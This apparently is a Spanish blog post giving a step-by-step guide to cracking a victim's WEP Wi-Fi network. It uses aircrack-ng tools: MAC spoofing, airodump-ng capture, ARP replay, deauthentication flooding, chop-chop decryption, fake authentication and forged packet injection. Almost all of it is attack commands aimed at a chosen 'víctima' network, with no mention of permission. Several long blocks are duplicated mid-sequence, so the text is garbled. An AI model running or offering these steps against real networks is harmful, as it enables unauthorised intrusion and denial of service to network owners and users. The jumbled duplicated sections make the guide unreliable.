DEFINICIONES:
ch: Canal de la víctima.
interface: Nombre de la tarjeta de red a utilizar.
BSSID: Dirección de la víctima el hexadecimal (XX:XX:XX:XX:XX:XX)
ESSID: Nombre de la víctima
MAC: Dirección de nuestra tarjeta de red en hexadecimal (XX:XX:XX:XX:XX:XX)
1. FAKEAMOS NUESTRA DIRECCIÓN MAC (3 formas)
a) Mediante la aplicación Macchanger del entorno gráfico
b) Mediante comandos: macchanger
• macchanger –m 00:11:22:33:44:55
c) Mediante comandos: ifconfig
• ifconfig <interface> down
• ifconfig <interface> hw ether 00:11:22:33:44:55
• ifconfig <interface> up
2. ESCANEO DE REDES
Escaneamos las redes, escogemos la víctima y apuntamos su BSSID y su canal. Usaremos el siguiente comando:
• airodump-ng <interface>
3) CAMBIO DE CANAL DE LA TARJETA DE RED
Usaremos el siguiente comando:
• airmon-ng start <interface> <ch>
4) CAPTURA DE PAQUETES
Ejecutaremos el comando airodump filtrando las redes por canal y BSSID:
• airodump-ng -c <ch> -b <BSSID víctima> -w <nombre del archivo> <interface>
Este comando, aparte de empezar la captura de IV’s nos dará la información necesaria para los siguientes pasos.
5) ATAQUE Para atacar, seguiremos el siguiente algoritmo lógico por orden:
1.Vemos en la captura de paquetes que hay clientes asociados a la red. Procedemos lanzando una reinyección de paquetes ARP al cliente asociado (ATK3) del siguiente modo:
• aireplay-ng -3 –b <BSSID víctima> -h <MAC cliente asociado> <interface>
Observamos que:
1.1.Hay tráfico ARP y/o los IV’s aumentan rápidamente. Esto significa que el cliente está generando tráfico y estamos capturando los Vectores de inicialización. Todo es correcto, esperamos a que aumenten los IV’s hasta unos 250.000 y nos disponemos a atacar con aircrack.
1.2.No hay tráfico ARP y/o los IV’s no aumentan o lo hacen lentamente. En este caso procederemos lanzando un ataque DDoS (ATK0), y si no funciona, lanzaremos un ataque Chop-chop de Korek (ATK4):
a) ATK0: Procedemos de la siguiente forma:
• aireplay-ng -0 0 –a <BSSID víctima> -c <MAC cliente asociado> <interface> (En caso de que estemos asociados a un solo cliente)
• aireplay-ng -0 0 -a <BSSID víctima> <interface> (En caso de que estemos asociados varios clientes)
b) ATK4: Procedemos de la siguiente forma:
• aireplay-ng -4 –h <MAC cliente asociado> -r <nombre de archivo.cap> <interface>
Al cavo de un rato, el ataque habrá desencriptado el paquete y mostrará:
“Saving plaintext in <nombre que copiaremos al portapapeles.cap>”
“Saving keystream in <nombre que copiaremos al portapapeles.xor>”
Copiaremos el nombre al portapapeles. Para el siguiente comando necesitamos la dirección privada que el AP ha asignado al cliente, por lo tanto procedemos con el siguiente comando:
• tcpdump –s 0 –n –e –r <nombre que copiamos al portapapeles.cap>
Bién, ya tenemos la Ip del cliente asociado, ahora forjaremos el paquete .cap usando la aplicación de consola packetforge para enviarlo a la víctima:
• packetforge-ng -0 –a <BSSID víctima> -h <MAC falsa> -k <IP router> -l <IP cliente> -w <nombre de archivo a enviar.cap>
Y por último enviaremos el paquete mediante ATK2:
• aireplay-ng -2 –r <nombre de archivo a enviar.cap> <interface>
_________________________________• aireplay-ng -0 0 –a <BSSID víctima> -c <MAC cliente asociado> <interface> (En caso de que estemos asociados a un solo cliente)
• aireplay-ng -0 0 -a <BSSID víctima> <interface> (En caso de que estemos asociados varios clientes)
b) ATK4: Procedemos de la siguiente forma:
• aireplay-ng -4 –h <MAC cliente asociado> -r <nombre de archivo.cap> <interface>
Al cavo de un rato, el ataque habrá desencriptado el paquete y mostrará:
“Saving plaintext in <nombre que copiaremos al portapapeles.cap>”
“Saving keystream in <nombre que copiaremos al portapapeles.xor>”
Copiaremos el nombre al portapapeles. Para el siguiente comando necesitamos la dirección privada que el AP ha asignado al cliente, por lo tanto procedemos con el siguiente comando:
• tcpdump –s 0 –n –e –r <nombre que copiamos al portapapeles.cap>
Bién, ya tenemos la Ip del cliente asociado, ahora forjaremos el paquete .cap usando la aplicación de consola packetforge para enviarlo a la víctima:
• packetforge-ng -0 –a <BSSID víctima> -h <MAC falsa> -k <IP router> -l <IP cliente> -w <nombre de archivo a enviar.cap>
Y por último enviaremos el paquete mediante ATK2:
• aireplay-ng -2 –r <nombre de archivo a enviar.cap> <interface>
2. Vemos en la captura de paquetes que NO hay clientes asociados a la red. Procedemos lanzando una reinyección de paquetes ARP a un cliente falso de MAC y después creamos dicho cliente ATK1:
• aireplay-ng -3 –b <BSSID víctima> -h <MAC fakeada> <interface>
• aireplay-ng -1 30 –e <ESSID víctima> -a <BSSID víctima> -h <MAC fakeada> <interface>
Observamos que:
2.1. Hay tráfico ARP y/o los IV’s aumentan rápidamente. Esto significa que con el cliente falso estamos generando tráfico y estamos capturando los Vectores de inicialización. Todo es correcto, esperamos a que aumenten los IV’s hasta 250.000 y nos disponemos a atacar con aircrack.
2.2. No hay tráfico ARP y/o los IV’s no aumentan o lo hacen lentamente. En este caso procederemos lanzando el ataque Chop-chop de Korek (ATK4) de la siguiente forma:
a) ATK4: Procedemos de la siguiente forma:
• aireplay-ng -4 –h <MAC cliente asociado> -r <nombre de archivo.cap> <interface>
Al cavo de un rato, el ataque habrá desencriptado el paquete y mostrará:
“Saving plaintext in <nombre que copiaremos al portapapeles.cap>”
“Saving keystream in <nombre que copiaremos al portapapeles.xor>”
Copiaremos el nombre al portapapeles. Para el siguiente comando necesitamos la dirección privada que el AP ha asignado al cliente falso, por lo tanto procedemos con el siguiente comando:
• tcpdump –s 0 –n –e –r <nombre que copiamos al portapapeles.cap>
Bién, ya tenemos la Ip del cliente asociado, ahora forjaremos el paquete .cap usando la aplicación de consola packetforge para enviarlo a la víctima:
• packetforge-ng -0 –a <BSSID víctima> -h <MAC falsa> -k <IP router> -l <IP cliente> -w <nombre de archivo a enviar.cap>
Y por último enviaremos el paquete mediante ATK2:
• aireplay-ng -2 –r <nombre de archivo a enviar.cap> <interface>
• aireplay-ng -4 –h <MAC cliente asociado> -r <nombre de archivo.cap> <interface>
Al cavo de un rato, el ataque habrá desencriptado el paquete y mostrará:
“Saving plaintext in <nombre que copiaremos al portapapeles.cap>”
“Saving keystream in <nombre que copiaremos al portapapeles.xor>”
Copiaremos el nombre al portapapeles. Para el siguiente comando necesitamos la dirección privada que el AP ha asignado al cliente falso, por lo tanto procedemos con el siguiente comando:
• tcpdump –s 0 –n –e –r <nombre que copiamos al portapapeles.cap>
Bién, ya tenemos la Ip del cliente asociado, ahora forjaremos el paquete .cap usando la aplicación de consola packetforge para enviarlo a la víctima:
• packetforge-ng -0 –a <BSSID víctima> -h <MAC falsa> -k <IP router> -l <IP cliente> -w <nombre de archivo a enviar.cap>
Y por último enviaremos el paquete mediante ATK2:
• aireplay-ng -2 –r <nombre de archivo a enviar.cap> <interface>
Y eso es todo... el tema de aircrack es mas facil, buscad en el foro de seguridadwireless que hay manuales buenos sobre esto.
No hay comentarios:
Publicar un comentario